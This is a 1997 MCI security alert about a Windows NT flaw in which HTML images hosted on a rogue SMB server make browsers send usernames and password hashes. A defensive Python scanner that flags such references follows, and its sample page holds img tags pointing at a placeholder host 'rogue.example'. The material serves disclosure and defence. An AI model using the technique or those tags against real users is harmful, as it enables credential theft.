MCI Telecommunications
internetMCI Security Group

Report Title:         iMCI MIIGS Security Alert
Report Name:          SMB NEGOTIATION EXPOSURE
Report Number:        iMCISE:IMCINTSECURITY:031597:01:P1R1
Report Date:          03/15/97
Report Format:        Formal Report
Classification:       MCI Informational Report
Reference:            http://www.security.mci.net
Report Distribution:  iMCI Security, MCI Internal Internet Gateway Security (MIIGS),
                      MCI Emergency Alert List (MEALS) (names on file)

--------------------------------------------------------------------------

Alert taken from: http://www.ntshop.net/security/ie3-4.htm

----------------------------------------------------------------------

HTML CAN FORCE AN SMB NEGOTIATION

VERSION AFFECTED:
  Netscape Navigator 3.01 running NT 4.0
  Microsoft Internet Explorer 3.01 with Security Patches, running NT 4.0

So far, this has only been confirmed on the following test benches:
  Windows NT 4.0 Server Service Patch 2 - Internet Explorer 3.01B
  Windows NT 4.0 Server Service Patch 2 - Netscape Navigator 3.01p
  Windows NT 4.0 Workstation Service Patch 2 - Internet Explorer 3.01B
  Windows NT 4.0 Workstation Service Patch 2 - Netscape Navigator 3.01

How it Works:

Use a Web page that points to a Rogue SMB Server:

This web page contains an embedded image (actually two). The embedded
images do not reside in the same directory as this web page. In fact,
they reside on an SMB Lanman server (as opposed to an HTTP server).

The modified SMB Server

In order for the client to download the images, the client needs to
'logon' to the Lanman server. Windows NT seems to do this without even
asking the user for confirmation. Windows NT simply forwards the username
and an encrypted version of the user's password to the Lanman server. The
Lanman server code has been modified slightly to record Usernames and
"Hashed Passwords" of the victims. Also the code has been modified to
supply the client with a fixed "Challenge seed value" for password
encryption. (Thus making it even easier to decode the client passwords
in the future.)

What's the big deal?

First of all, no remote web site should be able to record your username.
If they do, then they can compile junk email lists and sell your name.
Secondly, if they have information on what your password might be, and
they know what site you came from, they can gain access to your computer
or local account. (Thus compromising your security with you never knowing
about it.)

It is fairly easy to decrypt an MS password if the challenge has been set
to zero via dictionary attacks. Sequential search brute force attacks work
as well if you can guess what types of characters are most common in the
password. Yes, it is time consuming, but if your account gets hacked, is
it really worth it?

It is interesting to note that in theory someone could set up a Lanman
server that makes a simultaneous connection back to the client as a
connection comes in. By simply relaying the same challenge and password
back to the client, the remote server could gain network access to the
vulnerable client.

CREDIT: Reported by Aaron Spangler
Posted on The NT Shop on March 14, 12 Noon

----------------------------------------------------------------------
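The "How it Works" section above turns on one observable fact: the page embeds images whose source is an SMB share rather than an HTTP server, and the browser's automatic fetch is what starts the logon. A defender reviewing inbound web content or mail bodies can check for exactly that pattern before a client ever renders the page. The following scanner is an added example written for this report, not code from the NT Shop posting or from MCI; it parses HTML with the Python standard library, collects the attributes browsers fetch without user action, and flags any reference that would resolve to a remote SMB host (UNC paths and file:/smb: URLs), reporting the host so it can be added to an egress block list. The sample page and the host name `rogue.example` are constructed for the demonstration.

```python
"""Flag HTML resource references that would make a Windows client open an
SMB session (and send its logon credentials) to an outside host.

Added example for the SMB negotiation alert above; not part of the original
posting. The sample page below is constructed, and 'rogue.example' is a
placeholder host name, not a real server.
"""
import re
from html.parser import HTMLParser

# (tag, attribute) pairs that browsers fetch automatically while rendering,
# i.e. without a click. This is the assumed set used for the demonstration.
AUTO_FETCH = {
    ("img", "src"), ("script", "src"), ("iframe", "src"), ("frame", "src"),
    ("embed", "src"), ("input", "src"), ("bgsound", "src"),
    ("object", "data"), ("link", "href"), ("body", "background"),
}

# \\host\share\file  or  //host/share/file (forward-slash UNC)
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")
# file://host/share/file, file:////host/share/file, smb://host/share/file
URL_RE = re.compile(r"^(?:file|smb):/{2,4}([^\\/]+)[\\/]", re.IGNORECASE)
LOCAL_DRIVE_RE = re.compile(r"^[a-z]:$")


class ResourceRefParser(HTMLParser):
    """Collect every auto-fetched (tag, attribute, value) triple in a page."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and (tag, name) in AUTO_FETCH:
                self.refs.append((tag, name, value.strip()))


def remote_smb_host(ref):
    """Return the host a reference would contact over SMB, or None.

    file:///C:/... style references name a local drive letter and are
    ignored, as are localhost references; everything else that uses a UNC
    or file:/smb: form names a server the client would authenticate to.
    """
    match = UNC_RE.match(ref) or URL_RE.match(ref)
    if not match:
        return None
    host = match.group(1).lower()
    if host in ("localhost", "127.0.0.1") or LOCAL_DRIVE_RE.match(host):
        return None
    return host


def find_smb_triggers(html):
    """Return a list of findings for references that would force an SMB logon."""
    parser = ResourceRefParser()
    parser.feed(html)
    findings = []
    for tag, attr, ref in parser.refs:
        host = remote_smb_host(ref)
        if host:
            findings.append({"tag": tag, "attr": attr, "ref": ref, "host": host})
    return findings


def hosts_to_block(findings):
    """Sorted, de-duplicated SMB hosts from the findings, for an egress filter."""
    return sorted({f["host"] for f in findings})


# Constructed sample: one ordinary image, two SMB-hosted images (the pattern
# described in the alert), and a stylesheet on a local drive that is benign.
SAMPLE_PAGE = """<html><body background="bg.gif">
<img src="logo.gif">
<img src="\\\\rogue.example\\pics\\a.gif">
<img src="file://rogue.example/pics/b.gif">
<link rel="stylesheet" href="file:///C:/style/site.css">
<img src="http://www.example.com/c.gif">
</body></html>"""

if __name__ == "__main__":
    for finding in find_smb_triggers(SAMPLE_PAGE):
        print("SMB logon trigger: <{tag} {attr}=\"{ref}\"> -> {host}".format(**finding))
    print("hosts to block:", hosts_to_block(find_smb_triggers(SAMPLE_PAGE)))
```

The check is deliberately limited to attributes that load without a click, because that is what makes the alert's page dangerous: the user never confirms the logon. References behind an ordinary `<a href>` are left out since they still require user action. The host list is the useful output for the network side; with the offending hosts known, outbound SMB to them can be refused at the gateway.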